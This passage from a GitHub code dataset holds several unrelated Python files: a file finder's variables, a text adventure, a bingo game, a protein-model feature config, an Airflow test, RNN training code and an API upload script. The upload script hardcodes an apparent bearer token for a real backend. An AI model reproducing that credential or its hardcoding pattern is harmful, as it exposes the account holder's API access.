False\n\n# These files cannot be scan because the program hasn't permissions to access the file :c\nskipped_files = []\n\n# How many files are founded\nall_files = 0\n# How many files already scanned\nfiles_scanned = 0\n# Founded files\nfounded = []\n# --------------------------\n# Founded dir's\ndirs = []\n# How many dir's already scanned\ndirs_scanned = 0\n# How many dir's exists\ndirs_total = 0\n# --------------------------\n# Founded text lines (/path/to/file.txt (in line 34), ...)\ntexts = []\n# How many words are readed\nwords_readed = 0\n# How many words exists\nwords_total = 0\n# --------------------------\n# This blacklist is for files, where the program can't calculate the MD5 hash!\nblacklist = [ \"steam.pipe\" ]\n# --------------------------\n# The program will ignore these files/folders\nignore_Files = []\nignore_Folders = []","repo_name":"Mondei1/FileFinder","sub_path":"lib/var.py","file_name":"var.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1822058534","text":"class Point():\n def __init__(self, x_val, y_val):\n self.x_coord = x_val\n self.y_coord = y_val\n \n def move(self, dx, dy):\n self.x_coord += dx\n self.y_coord += dy\n \n def __str__(self):\n return \"( \" + str(self.x_coord) + \", \" + str(self.y_coord) + \" )\"\n \n def multi(self, mn):\n self.x_coord *= mn\n self.y_coord *= mn\n \n# p1 = Point(0,0)\n# print(p1)\n# p1.move(1,1)\n# print(p1)\n# p1.multi(3)\n# print(p1)\n\nclass Des():\n def __init__(self, question, answer):\n self.question = question\n self.answer_list = answer\n self.connections = []\n self.connection = None\n \n def make_choice(self):\n print (self.question)\n choice = input(str(self.answer_list))\n while choice not in self.answer_list:\n print(\"Invalid Answer\")\n choice = input(str(self.answer_list))\n if choice == self.answer_list[0]:\n self.connection = self.connections[0]\n if choice == self.answer_list[1]:\n self.connection = self.connections[1]\n \n return self.connection\n\n def connectAndPick(self, con1, con2):\n self.connections.append(con1)\n self.connections.append(con2)\n \n\nstart = Des(\"Left or right?\", [\"left\", \"right\"])\nleft = Des(\"You find a mason. Claim the manson?\", [\"yes\", \"no\"])\nright = Des(\"You find a fire place. Go inside the fire?\", [\"go in\", \"stay out\"])\nfireplace = Des(\"You see a fairy, follow her?\", [\"follow\", \"don't follow\"])\nfollow = Des(\"You find a fairy viilage. Do you party with them?\", ['party', 'don\\'t party'])\nclaim = Des(\"You claim the manson. Do the paperwork?\", ['yes','no'])\ninside = Des(\"You don\\'t claim the mason. Go inside the manson?\", ['yes','no'])\nsteal = Des(\"You steal some stuff. Run away or stay and get more stuff?\", [\"run\", \"stay\"])\nstay = Des(\"Stay inside and wait. The owner returns, talk to them or no?\", ['talk', 'run'])\nvillage = Des(\"You find a village. Stay or no?\", [\"stay\", \"leave\"])\n\nstart.connectAndPick(left, right)\nleft.connectAndPick(claim, inside) \nright.connectAndPick(fireplace, \"You freez to death due to the cold.\")\nfireplace.connectAndPick(follow, \"Get killed by angry fairies.\")\nfollow.connectAndPick(village, \"You get killed out into the cold and die.\")\ninside.connectAndPick(steal, stay)\nclaim.connectAndPick(\"You do the paperwork and get a free mason.\", \"You don/'t do the paperwork and get sued and jailed by the real owner.\")\nsteal.connectAndPick(\"You get away with /$5000.\", \"You get caught and fined and go into debt.\")\nstay.connectAndPick(\"You two become friends and you become rich.\", \"You get jailed as a trespasser.\")\nvillage.connectAndPick(\"You live forever with the fairies\", \"You leave in two pieces(aka dead~).\")\n\ncurrent = start\nwhile type(current) is not str:\n current = current.make_choice()\nprint(current)\n \n ","repo_name":"chinguyen7/text-adventer","sub_path":"TextBasedAdvente.py","file_name":"TextBasedAdvente.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42025442774","text":"#!/bin/python3 -tt\n\n# Author: Fº Javier Gutierrez-Maturana Sanchez\n# \n# Description: This program play bingo, \n# each player has only one cartoon.\n\nimport random\nfrom Carton import Carton\n\nMAX_NUMBERS = 5\nMAX_VALUE = 90\nMAX_LINES = 3\nNUMBERS_LIST = tuple(range(1, MAX_VALUE + 1))\n\ndef main():\n cartoons = []\n\n cartoons.append(Carton(MAX_LINES, MAX_NUMBERS, MAX_VALUE))\n cartoons.append(Carton(MAX_LINES, MAX_NUMBERS, MAX_VALUE))\n cartoons.append(Carton(MAX_LINES, MAX_NUMBERS, MAX_VALUE))\n cartoons.append(Carton(MAX_LINES, MAX_NUMBERS, MAX_VALUE))\n\n # print(\"Bingo numbers!\\n{}\".format(NUMBERS_LIST))\n\n # print(\"---- Show perfects Cartoons ----\")\n # for i in range(len(cartoons)):\n # print (\"Carton {}\".format(i))\n # cartoons[i].debug_cartoon(0)\n # print(\"--------------------------------\")\n\n bingo = False\n winner = -1\n while not bingo:\n number = random.randint(1, MAX_VALUE)\n # print (\"Number! {}\".format(number))\n for player in range(len(cartoons)):\n cartoons[player].markNumber(number)\n\n if cartoons[player].hasLine():\n print(\"Player {} Line!\".format(player))\n\n if cartoons[player].hasBingo():\n winner = player\n bingo = True\n break # Only one winner\n\n if winner >= 0:\n print(\"Game finish Bingo! Player {}\".format(winner))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jgmatu/Bingo","sub_path":"Bingo.py","file_name":"Bingo.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45677806235","text":"\"\"\"Configuration for Input Feature Generation\r\n\"\"\"\r\nfrom __future__ import annotations\r\n\r\nfrom enum import Enum\r\nfrom typing import NamedTuple, List, Tuple, Union, Optional\r\nimport numpy as np \r\nfrom protein_learning.common.protein_constants import AA_ALPHABET\r\nfrom protein_learning.features.constants import SMALL_SEP_BINS, DEFAULT_PW_DIST_RADII\r\n\r\n\r\nclass FeatureDescriptor(NamedTuple):\r\n \"\"\"Descriptor for a given feature\"\"\"\r\n name: FeatureName\r\n ty: FeatureTy\r\n encode_dim: int\r\n embed_dim: int\r\n embed_tys: List[FeatureEmbeddingTy]\r\n # Optional - for embeddings\r\n mult: Optional[int] = 1\r\n rbf_sigma: Optional[float] = 4\r\n rbf_radii: Optional[List[float]] = None\r\n n_fourier_feats: Optional[int] = None\r\n\r\n\r\nclass InputFeatureConfig(NamedTuple):\r\n \"\"\"Config Input Features\"\"\"\r\n # Global settings\r\n # pad embeddings with an extra bin (n_classes+1) - can be used\r\n # in conjunction with sequence or coordinate masking, e.g.\r\n pad_embeddings: bool = False\r\n # add noise to one hot encodings?\r\n one_hot_noise_sigma: float = 0 # set>0 to have this amount of random noise added\r\n\r\n # Residue Type (SCALAR)\r\n embed_res_ty: bool = False\r\n one_hot_res_ty: bool = False\r\n res_ty_embed_dim: int = 32\r\n res_ty_corrupt_prob: float = 0\r\n\r\n # Residue Relative Position (SCALAR)\r\n embed_res_rel_pos: bool = False\r\n one_hot_res_rel_pos: bool = False\r\n res_rel_pos_embed_dim: int = 6\r\n res_rel_pos_encode_dim: int = 10\r\n\r\n # BB Dihedral (SCALAR)\r\n embed_bb_dihedral: bool = False\r\n one_hot_bb_dihedral: bool = False\r\n fourier_encode_bb_dihedral: bool = False\r\n bb_dihedral_embed_dim: int = 6\r\n bb_dihedral_encode_dim: int = 36\r\n n_bb_dihedral_fourier_feats: int = 2\r\n\r\n # SC Dihedral (SCALAR)\r\n include_sc_dihedral: bool = False\r\n sc_dihedral_noise: List[float] = [0,0]\r\n\r\n # Centrality (SCALAR)\r\n embed_centrality: bool = False\r\n one_hot_centrality: bool = False\r\n rbf_encode_centrality: bool = False\r\n centrality_encode_dim: int = 6\r\n centrality_embed_dim: int = 6\r\n centrality_rbf_radii: List[float] = [6, 12, 18, 24, 30, 36]\r\n\r\n # Secondary Structure\r\n embed_sec_struct: bool = False\r\n sec_struct_embed_dim: int = 16\r\n\r\n # Relative Separation (PAIR)\r\n embed_rel_sep: bool = False\r\n one_hot_rel_sep: bool = False\r\n rel_sep_embed_dim: int = 32\r\n rel_sep_encode_bins: List[int] = SMALL_SEP_BINS\r\n\r\n # Relative Distance (PAIR)\r\n embed_rel_dist: bool = False\r\n one_hot_rel_dist: bool = False\r\n rbf_encode_rel_distance: bool = False\r\n rel_dist_embed_dim: int = 16\r\n rel_dist_encode_dim: int = 32\r\n rel_dist_bounds: Tuple[float, float] = (2.5, 16.5)\r\n rel_dist_rbf_radii: List[float] = DEFAULT_PW_DIST_RADII\r\n rel_dist_atom_tys: List[str] = [\"CA\", \"CA\", \"N\", \"CA\"]\r\n\r\n # trRosetta Orientation (PAIR)\r\n embed_tr_rosetta_ori: bool = False\r\n one_hot_tr_rosetta_ori: bool = False\r\n fourier_encode_tr_rosetta_ori: bool = False\r\n tr_rosetta_ori_embed_dim: int = 6\r\n tr_rosetta_ori_encode_dim: int = 36\r\n tr_rosetta_fourier_feats: int = 2\r\n\r\n # Joint Embedding for Pair and Sep (PAIR)\r\n joint_embed_res_pair_rel_sep: bool = False\r\n joint_embed_res_pair_rel_sep_embed_dim: int = 48\r\n\r\n # Invariant relative orientation features\r\n quat_encode_rel_ori: bool = False\r\n encode_local_rel_coords: bool = False\r\n\r\n # relative chain embedding\r\n one_hot_rel_chain: bool = False\r\n\r\n # Extra\r\n extra_residue_dim: int = 0\r\n extra_pair_dim: int = 0\r\n coord_noise: float = 0\r\n\r\n @property\r\n def include_res_ty(self):\r\n \"\"\"Whether to include residue type features\"\"\"\r\n return self.joint_embed_res_pair_rel_sep \\\r\n or self.embed_res_ty \\\r\n or self.one_hot_res_ty # noqa\r\n\r\n @property\r\n def include_rel_pos(self):\r\n \"\"\"Whether to include residue position features\"\"\"\r\n return self.embed_res_rel_pos or self.one_hot_res_rel_pos\r\n\r\n @property\r\n def include_bb_dihedral(self):\r\n \"\"\"Whether to include bb dihedral features\"\"\"\r\n return self.embed_bb_dihedral or self.one_hot_bb_dihedral or \\\r\n self.fourier_encode_bb_dihedral # noqa\r\n\r\n @property\r\n def include_centrality(self):\r\n \"\"\"Whether to include centrality features\"\"\"\r\n return self.embed_centrality or self.one_hot_centrality or self.rbf_encode_centrality\r\n\r\n @property\r\n def include_rel_sep(self):\r\n \"\"\"Whether to include relative separation features\"\"\"\r\n return self.one_hot_rel_sep or self.embed_rel_sep \\\r\n or self.joint_embed_res_pair_rel_sep # noqa\r\n\r\n @property\r\n def include_rel_dist(self):\r\n \"\"\"Whether to include relative distance features\"\"\"\r\n return self.one_hot_rel_dist or self.embed_rel_dist or self.rbf_encode_rel_distance\r\n\r\n @property\r\n def rel_dist_atom_pairs(self) -> List[Tuple[str, str]]:\r\n \"\"\"atom pairs to use for relative distance\"\"\"\r\n tys = self.rel_dist_atom_tys\r\n return list(zip(tys[::2], tys[1::2]))\r\n\r\n @property\r\n def include_tr_ori(self):\r\n \"\"\"Whether to include TrRosetta orientation features\r\n\r\n Note: CB atom must be present to sue these features - can add\r\n \"impute_cb\" flag to data loader if this atom is not available.\r\n \"\"\"\r\n return self.embed_tr_rosetta_ori or self.fourier_encode_tr_rosetta_ori \\\r\n or self.one_hot_tr_rosetta_ori # noqa\r\n\r\n @property\r\n def include_rel_ori(self):\r\n \"\"\"Whether to include relative orientation information\r\n e.g. quaternion of (pairwise) relative orientation matrices.\r\n \"\"\"\r\n return self.quat_encode_rel_ori\r\n\r\n @property\r\n def has_extra(self):\r\n \"\"\"Whether the input features include flags\"\"\"\r\n return self.extra_residue_dim > 0 or self.extra_pair_dim > 0\r\n\r\n @property\r\n def descriptors(self) -> List[FeatureDescriptor]:\r\n \"\"\"Get a list of FeatureDescriptors\r\n For all features specified by the config\r\n \"\"\"\r\n descriptors = []\r\n\r\n if self.embed_sec_struct:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.SS,\r\n ty=FeatureTy.RESIDUE,\r\n encode_dim=3,\r\n embed_dim=self.sec_struct_embed_dim,\r\n embed_tys=[FeatureEmbeddingTy.EMBED]\r\n )\r\n )\r\n\r\n if self.include_res_ty:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.RES_TY,\r\n ty=FeatureTy.RESIDUE,\r\n encode_dim=len(AA_ALPHABET),\r\n embed_dim=self.res_ty_embed_dim,\r\n embed_tys=_get_encoding_tys(\r\n embed=self.embed_res_ty,\r\n one_hot=self.one_hot_res_ty\r\n )\r\n\r\n )\r\n\r\n )\r\n\r\n if self.include_rel_pos:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.REL_POS,\r\n ty=FeatureTy.RESIDUE,\r\n encode_dim=self.res_rel_pos_encode_dim,\r\n embed_dim=self.res_rel_pos_embed_dim,\r\n embed_tys=_get_encoding_tys(\r\n embed=self.embed_res_rel_pos,\r\n one_hot=self.one_hot_res_rel_pos\r\n )\r\n )\r\n\r\n )\r\n\r\n if self.include_bb_dihedral:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.BB_DIHEDRAL,\r\n ty=FeatureTy.RESIDUE,\r\n encode_dim=self.bb_dihedral_encode_dim,\r\n embed_dim=self.bb_dihedral_embed_dim,\r\n embed_tys=_get_encoding_tys(\r\n embed=self.embed_bb_dihedral,\r\n one_hot=self.one_hot_bb_dihedral,\r\n fourier=self.fourier_encode_bb_dihedral,\r\n ),\r\n mult=3,\r\n n_fourier_feats=self.n_bb_dihedral_fourier_feats\r\n ),\r\n )\r\n\r\n if self.include_centrality:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.CENTRALITY,\r\n ty=FeatureTy.RESIDUE,\r\n encode_dim=self.centrality_encode_dim,\r\n embed_dim=self.centrality_embed_dim,\r\n embed_tys=_get_encoding_tys(\r\n embed=self.embed_centrality,\r\n one_hot=self.one_hot_centrality,\r\n rbf=self.rbf_encode_centrality,\r\n ),\r\n rbf_radii=self.centrality_rbf_radii,\r\n ),\r\n )\r\n\r\n if self.include_rel_sep:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.REL_SEP,\r\n ty=FeatureTy.PAIR,\r\n encode_dim=len(self.rel_sep_encode_bins),\r\n embed_dim=self.rel_sep_embed_dim,\r\n embed_tys=_get_encoding_tys(\r\n embed=self.embed_rel_sep,\r\n one_hot=self.one_hot_rel_sep,\r\n ),\r\n ),\r\n )\r\n\r\n if self.include_rel_dist:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.REL_DIST,\r\n ty=FeatureTy.PAIR,\r\n encode_dim=self.rel_dist_encode_dim,\r\n embed_dim=self.rel_dist_embed_dim,\r\n embed_tys=_get_encoding_tys(\r\n embed=self.embed_rel_dist,\r\n one_hot=self.one_hot_rel_dist,\r\n rbf=self.rbf_encode_rel_distance,\r\n ),\r\n mult=len(self.rel_dist_atom_tys) // 2,\r\n rbf_sigma=np.mean([(x-y) for x,y in zip(self.rel_dist_rbf_radii[1:],self.rel_dist_rbf_radii[:-1])]),\r\n rbf_radii=self.rel_dist_rbf_radii,\r\n ),\r\n )\r\n\r\n if self.include_tr_ori:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.TR_ORI,\r\n ty=FeatureTy.PAIR,\r\n encode_dim=self.tr_rosetta_ori_encode_dim,\r\n embed_dim=self.tr_rosetta_ori_embed_dim,\r\n embed_tys=_get_encoding_tys(\r\n embed=self.embed_tr_rosetta_ori,\r\n one_hot=self.one_hot_tr_rosetta_ori,\r\n fourier=self.fourier_encode_tr_rosetta_ori,\r\n ),\r\n mult=3,\r\n n_fourier_feats=self.tr_rosetta_fourier_feats,\r\n\r\n ),\r\n )\r\n\r\n if self.quat_encode_rel_ori:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.REL_ORI,\r\n ty=FeatureTy.PAIR,\r\n encode_dim=4,\r\n embed_dim=4,\r\n embed_tys=[FeatureEmbeddingTy.NONE]\r\n ),\r\n )\r\n\r\n if self.encode_local_rel_coords:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.REL_COORD,\r\n ty=FeatureTy.PAIR,\r\n encode_dim=3,\r\n embed_dim=3,\r\n embed_tys=[FeatureEmbeddingTy.NONE]\r\n ),\r\n )\r\n\r\n if self.one_hot_rel_chain:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.REL_CHAIN,\r\n ty=FeatureTy.PAIR,\r\n encode_dim=5,\r\n embed_dim=5,\r\n embed_tys=[FeatureEmbeddingTy.ONEHOT]\r\n ),\r\n )\r\n\r\n if self.extra_pair_dim > 0:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.EXTRA_PAIR,\r\n ty=FeatureTy.PAIR,\r\n encode_dim=self.extra_pair_dim,\r\n embed_dim=self.extra_pair_dim,\r\n embed_tys=[FeatureEmbeddingTy.NONE]\r\n ),\r\n )\r\n\r\n if self.extra_residue_dim > 0:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.EXTRA_RES,\r\n ty=FeatureTy.RESIDUE,\r\n encode_dim=self.extra_residue_dim,\r\n embed_dim=self.extra_residue_dim,\r\n embed_tys=[FeatureEmbeddingTy.NONE]\r\n ),\r\n )\r\n\r\n if self.include_sc_dihedral:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.SC_DIHEDRAL,\r\n ty=FeatureTy.RESIDUE,\r\n embed_tys=[FeatureEmbeddingTy.NONE],\r\n encode_dim=21,\r\n embed_dim=21,\r\n ),\r\n )\r\n\r\n return descriptors\r\n\r\n def include_feat(self, name: Union[str, FeatureName]) -> bool:\r\n \"\"\"Whether the config specifies the given feature\"\"\"\r\n name = name if isinstance(name, str) else name.value\r\n if name == FeatureName.REL_POS.value:\r\n return self.include_rel_pos\r\n if name == FeatureName.REL_SEP.value:\r\n return self.include_rel_sep\r\n if name == FeatureName.REL_DIST.value:\r\n return self.include_rel_dist\r\n if name == FeatureName.BB_DIHEDRAL.value:\r\n return self.include_bb_dihedral\r\n if name == FeatureName.CENTRALITY.value:\r\n return self.include_centrality\r\n if name == FeatureName.RES_TY.value:\r\n return self.include_res_ty\r\n if name == FeatureName.TR_ORI.value:\r\n return self.include_tr_ori\r\n if name == FeatureName.REL_ORI:\r\n return self.include_rel_ori\r\n if name == FeatureName.REL_COORD:\r\n return self.encode_local_rel_coords\r\n if name == FeatureName.REL_CHAIN:\r\n return self.one_hot_rel_chain\r\n if name == FeatureName.EXTRA_RES:\r\n return self.extra_residue_dim > 0\r\n if name == FeatureName.EXTRA_PAIR:\r\n return self.extra_pair_dim > 0\r\n if name == FeatureName.SC_DIHEDRAL:\r\n return self.include_sc_dihedral\r\n\r\n\r\nclass FeatureTy(Enum):\r\n \"\"\"Feature Type flag\r\n \"\"\"\r\n RESIDUE, COORD, PAIR = 1, 2, 3\r\n\r\n\r\nclass FeatureEmbeddingTy(Enum):\r\n \"\"\"Feature Type flag\r\n \"\"\"\r\n RBF, ONEHOT, EMBED, FOURIER, NONE = 0, 1, 2, 3, 4\r\n\r\n\r\ndef _get_encoding_tys(one_hot=False, embed=False, rbf=False, fourier=False) -> List[FeatureEmbeddingTy]:\r\n \"\"\"Encoding type for feature\"\"\"\r\n encoding_tys = []\r\n if one_hot:\r\n encoding_tys.append(FeatureEmbeddingTy.ONEHOT)\r\n if embed:\r\n encoding_tys.append(FeatureEmbeddingTy.EMBED)\r\n if rbf:\r\n encoding_tys.append(FeatureEmbeddingTy.RBF)\r\n if fourier:\r\n encoding_tys.append(FeatureEmbeddingTy.FOURIER)\r\n return encoding_tys\r\n\r\n\r\nclass FeatureName(Enum):\r\n \"\"\"Identifiers for each feature type\r\n \"\"\"\r\n REL_POS = \"rel_pos\"\r\n REL_SEP = \"rel_sep\"\r\n REL_DIST = \"rel_dist\"\r\n BB_DIHEDRAL = \"bb_dihedral\"\r\n CENTRALITY = \"centrality\"\r\n RES_TY = \"res_ty\"\r\n TR_ORI = \"tr_ori\"\r\n REL_ORI = \"rel_ori\"\r\n REL_COORD = \"rel_coord\"\r\n REL_CHAIN = \"rel_chain\"\r\n EXTRA_RES = \"extra_res\"\r\n EXTRA_PAIR = \"extra_pair\"\r\n SS = \"sec_struct\"\r\n SC_DIHEDRAL=\"sc_dihedral\"\r\n\r\n\r\nFEATURE_NAMES = [\r\n FeatureName.REL_POS,\r\n FeatureName.REL_SEP,\r\n FeatureName.REL_DIST,\r\n FeatureName.BB_DIHEDRAL,\r\n FeatureName.CENTRALITY,\r\n FeatureName.RES_TY,\r\n FeatureName.TR_ORI,\r\n FeatureName.REL_ORI,\r\n FeatureName.REL_COORD,\r\n FeatureName.REL_CHAIN,\r\n FeatureName.EXTRA_RES,\r\n FeatureName.EXTRA_PAIR,\r\n FeatureName.SS,\r\n FeatureName.SC_DIHEDRAL,\r\n]\r\n","repo_name":"MattMcPartlon/AttnPacker","sub_path":"protein_learning/features/feature_config.py","file_name":"feature_config.py","file_ext":"py","file_size_in_byte":16161,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"21"} +{"seq_id":"73028068533","text":"# -*- coding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\nfrom datetime import datetime, timedelta\n\nfrom airflow.ti_deps.deps.not_in_retry_period_dep import NotInRetryPeriodDep\nfrom airflow.utils.state import State\nfrom fake_models import FakeDag, FakeTask, FakeTI\n\n\nclass NotInRetryPeriodDepTest(unittest.TestCase):\n\n def test_still_in_retry_period(self):\n \"\"\"\n Task instances that are in their retry period should fail this dep\n \"\"\"\n dag = FakeDag()\n task = FakeTask(dag=dag, retry_delay=timedelta(minutes=1))\n ti = FakeTI(\n task=task,\n state=State.UP_FOR_RETRY,\n end_date=datetime(2016, 1, 1),\n is_premature=True)\n\n self.assertFalse(NotInRetryPeriodDep().is_met(ti=ti, dep_context=None))\n\n def test_retry_period_finished(self):\n \"\"\"\n Task instance's that have had their retry period elapse should pass this dep\n \"\"\"\n dag = FakeDag()\n task = FakeTask(dag=dag, retry_delay=timedelta(minutes=1))\n ti = FakeTI(\n task=task,\n state=State.UP_FOR_RETRY,\n end_date=datetime(2016, 1, 1),\n is_premature=False)\n\n self.assertTrue(NotInRetryPeriodDep().is_met(ti=ti, dep_context=None))\n\n def test_not_in_retry_period(self):\n \"\"\"\n Task instance's that are not up for retry can not be in their retry period\n \"\"\"\n dag = FakeDag()\n task = FakeTask(dag=dag)\n ti = FakeTI(task=task, state=State.SUCCESS)\n\n self.assertTrue(NotInRetryPeriodDep().is_met(ti=ti, dep_context=None))\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/apache_incubator-airflow/incubator-airflow-master/tests/ti_deps/deps/not_in_retry_period_dep.py","file_name":"not_in_retry_period_dep.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"20043779423","text":"'''\nThis module can be used to train models according to the following training rules\n\tBPTT:\n\tGenetic:\n\tHebian:\n\tFORCE:\n\nAuthor: Brandon McMahan\nJune 24, 2019\n'''\n\nimport numpy as np \nfrom rnn import RNN \nimport rnntools as r\nfrom task.williams import Williams \nimport utils\nimport matplotlib.pyplot as plt \nfrom train.bptt import Bptt \nfrom train.genetic import Genetic \nfrom train.hebian_clone import Hebian\nfrom train.force_BM import Force\nfrom FP_Analysis import FindFixedPoints\nfrom task.contexttask import ContextTask\n\n#RNN architecture\ninput_size = 1\nhidden_size = 50\noutput_size = 1\n\n#create the task\ntask = Williams()\ncontext_task = ContextTask()\n\n\ndef TrainBPTT(identifier, hidden_size=hidden_size, num_epochs=2_000, learning_rate=1e-4):\n\tbptt_model = RNN(input_size, hidden_size, output_size, var=0.01)\n\t#train BPTT\n\t\n\t#num_epochs=2_000\n\ttrial_length=40\n\ttrainer=Bptt(bptt_model, task, learning_rate, num_epochs, trial_length)\n\ttrainer.init_network()\n\ttrainer.trainBPTT()\n\tF = bptt_model.GetF()\n\troots, pca = FindFixedPoints(F, [1,0.9,0.8,0.7,0.6,0.5,0.4,0.3,0.2,0.1,\\\n\t\t\t\t-0.1,-0.2,-0.3,-0.4,-0.5,-0.6,-0.7,-0.8,-0.9,-1], num_hidden=hidden_size)\n\tbptt_model.pca = pca\n\tbptt_model.save('bptt_model'+str(identifier))\n\treturn bptt_model\n\ndef TrainBPTT_context(identifier, hidden_size=hidden_size, num_epochs=10_000, learning_rate=5e-5):\n\tbptt_model = RNN(4, hidden_size, 1, var=0.01)\n\t#train BPTT\n\t\n\ttrial_length=40\n\ttrainer=Bptt(bptt_model, context_task, learning_rate, num_epochs, trial_length)\n\ttrainer.init_network()\n\ttrainer.trainBPTT()\n\t#F = bptt_model.GetF()\n\t#roots, pca = FindFixedPoints(F, [1,0.9,0.8,0.7,0.6,0.5,0.4,0.3,0.2,0.1,\\\n\t#\t\t\t-0.1,-0.2,-0.3,-0.4,-0.5,-0.6,-0.7,-0.8,-0.9,-1], num_hidden=hidden_size)\n\t#bptt_model.pca = pca\n\tbptt_model.save('bptt_context_model'+str(identifier))\n\tplt.plot(bptt_model.losses)\n\tplt.show()\n\treturn bptt_model\n\ndef TrainGenetic(identifier, num_generations=15):\n\tgenetic_model = RNN(input_size, hidden_size, output_size)\n\t#train model using genetic algorithm\n\tnum_pop=50\n\tsigma=0.01\n\t#num_generations=15\n\ttrainer = Genetic(genetic_model, task, num_generations)\n\ttrainer.trainGenetic(num_pop, sigma, batch_size=50, num_parents=5, mutation=0.1)\n\tF = genetic_model.GetF()\n\troots, pca = FindFixedPoints(F, [[1],[0.9],[0.8],[0.7],[0.6],[0.5],[0.4],[0.3],[0.2],[0.1],\\\n\t\t\t\t[-0.1],[-0.2],[-0.3],[-0.4],[-0.5],[-0.6],[-0.7],[-0.8],[-0.9],[-1]])\n\tgenetic_model.pca = pca\n\tgenetic_model.save('genetic_model'+str(identifier))\n\treturn genetic_model\n\n\ndef TrainHebian(identifier, num_epochs=2_000):\n\thebian_model = RNN(input_size, hidden_size, output_size)\n\t#train model using Hebian learning\n\ttrainer = Hebian(hebian_model, task, alpha_trace = 0.5)\n\ttrainer.TrainHebbian(num_trials=num_epochs)\n\tF = hebian_model.GetF()\n\troots, pca = FindFixedPoints(F, [1,0.9,0.8,0.7,0.6,0.5,0.4,0.3,0.2,0.1,\\\n\t\t\t\t-0.1,-0.2,-0.3,-0.4,-0.5,-0.6,-0.7,-0.8,-0.9,-1])\n\thebian_model.pca = pca\n\thebian_model.save('hebian_model'+str(identifier))\n\treturn hebian_model\n\n\ndef TrainFORCE(identifier, num_epochs=2_000):\n\tforce_model = RNN(input_size, hidden_size, output_size)\n\t#train model using FORCE\n\ttrainer = Force(force_model, task, alpha=1000)\n\ttrainer.trainForce(num_trials=num_epochs)\n\tF = force_model.GetF()\n\troots, pca = FindFixedPoints(F, [1,0.9,0.8,0.7,0.6,0.5,0.4,0.3,0.2,0.1,\\\n\t\t\t\t-0.1,-0.2,-0.3,-0.4,-0.5,-0.6,-0.7,-0.8,-0.9,-1])\n\tforce_model.pca = pca\n\tforce_model.save('force_model'+str(identifier))\n\treturn force_model\n","repo_name":"bmcmahan2016/RNN_Learning","sub_path":"train_models.py","file_name":"train_models.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73365813814","text":"import json\r\nimport requests\r\n\r\nurl = \"https://backend.coreproject.moe/api/v1/anime\"\r\nheaders = {\"accept\": \"application/json\", \"Authorization\": \"Bearer uBRFvhuEDUiuviXU\"}\r\nfiles = {\r\n \"banner\": open(\"image.webp\", \"rb\"),\r\n \"cover\": open(\"image.webp\", \"rb\"),\r\n}\r\ndata = {\r\n \"aired_from\": \"1998-04-03T00:00:00Z\",\r\n \"anilist_id\": 1,\r\n \"producers\": [2, 3],\r\n \"mal_id\": 1,\r\n \"kitsu_id\": 1,\r\n \"name_japanese\": \"fadsfasd\",\r\n \"themes\": [1, 2],\r\n \"name\": \"fdafsdfa\",\r\n \"name_synonyms\": \"baka,dasf\",\r\n \"genres\": [1, 2],\r\n \"aired_to\": \"1998-04-03T00:00:00Z\",\r\n \"synopsis\": \"dfadfadsfa\",\r\n \"source\": \"3dsffasfas\",\r\n \"studios\": [1, 2],\r\n \"rating\": 11,\r\n}\r\ndata = json.dumps(data)\r\nprint(data)\r\nresponse = requests.post(url, headers=headers, files=files, data=data)\r\nprint(response.json())\r\n","repo_name":"baseplate-admin/CoreProject","sub_path":"tools/seeder/seeders/automation/tempCodeRunnerFile.py","file_name":"tempCodeRunnerFile.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"21"} +{"seq_id":"8548269036","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n# 2014-01-19T19:39+08:00\n# http://blog.csdn.net/ubiter/article/details/19809145\n\nfrom re import compile as re_compile\n\n_percent_pat = re_compile(b'((?:%[A-Fa-f0-9]{2})+)')\n_unreserved_chars = frozenset(b'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n b'abcdefghijklmnopqrstuvwxyz'\n b'0123456789'\n b'_.-')\n\n# A simple implement of \"urllib.parse.unquote\"\ndef percent_decode(string, encoding = 'utf-8', errors = 'replace'):\n str_bytes = string.encode('utf-8')\n hex_to_byte = lambda match_ret: \\\n bytes.fromhex(\n match_ret.group(0).replace(b'%', b'').decode('utf-8'))\n str_bytes = 